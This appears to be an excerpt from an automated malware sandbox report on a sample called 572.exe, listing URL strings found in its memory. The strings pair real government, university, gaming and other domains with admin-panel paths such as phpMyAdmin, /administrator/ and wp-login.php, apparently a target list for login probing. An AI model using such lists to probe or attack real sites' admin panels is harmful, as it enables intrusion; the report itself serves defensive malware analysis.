                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/phpmyadmin/XA
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/pma/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/PhpMyAdmin/T
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/admin
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/admin.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/admin/
                Source: 572.exe, 00000009.00000003.4018148306.00000000640D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/admin/i5
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/administrator/WR
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/pma/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/wp-admin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.itzacatepec.edu.mx/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/PhpMyAdmin/&
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/phpMyAdmin/~
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sistemas.pa.gov.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4018148306.00000000640D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/PhpMyAdmin/hy
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/administrator//
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport.autoplay.cloud/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/PhpMyAdmin/Ye
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/administrator/L
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/administrator/index.phpbr995mx22
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srienlinea.sri.gob.ec/pma/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssc.nic.in/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssc.nic.in/administrator/A~
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssc.nic.in/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssc.nic.in/administrator/index.phpgames.com
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssc.nic.in/administrator/index.phpp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/PhpMyAdmin/G
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/admin.php
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/administrator/;
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/administrator/l
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/phpMyAdmin/143
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4315918557.000000004E183000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4315918557.000000004E183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/wp-admin/T
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl-es.hoteles.com/wp-login.php0
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9CF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.rapidssl.com0
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/PhpMyAdmin/Ee
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/admin.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/administrator/e
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/administrator/index.phpx.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/phpMyAdmin/econds
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/phpMyAdmin/uB
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamcommunity.com/wp-admin/oo
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/PhpMyAdmin/d
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/PhpMyAdmin/~x
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/admin.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/admin.phphp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/-
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/.
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/Y
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.phpO
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.phpX
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.phpebook.comL#
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.phphp
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/index.phpistC
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/administrator/r
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpMyAdmin/q
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpmyadmin/-login.php.joyalukkaV
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpmyadmin/9C
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/phpmyadmin/J
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/pma/)
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/pma/990
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/wp-admin/hpphp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.emis.gov.eg/administrator/
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://student.emis.gov.eg/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/administrator/.co21
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/phpMyAdmin/zC
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/phpmyadmin/LC
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://testconnect.garena.com/pma/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tiktok.com/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tiktok.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tiktok.com/administrator/index.phpJ
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tls21.net/admin
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tls21.net/adminb.mx/Jkv
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tls21.net/adminxyzskO
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transaccional.saludtotal.com.co/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transaccional.saludtotal.com.co/pma/Td
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/steam
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/PhpMyAdmin/w
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/admin.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/admin.phpH
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/admin.phphp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/administrator/edu.co995t
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpMyAdmin/y
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucivirtual.uci.edu.mx/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php.comU
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/administrator/index.php/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpMyAdmin/Mg
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/Vg
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ucv.blackboard.com/phpmyadmin/t
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/V
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php.com.br220
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/administrator/index.php;
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://upsconline.nic.in/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/e
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.php
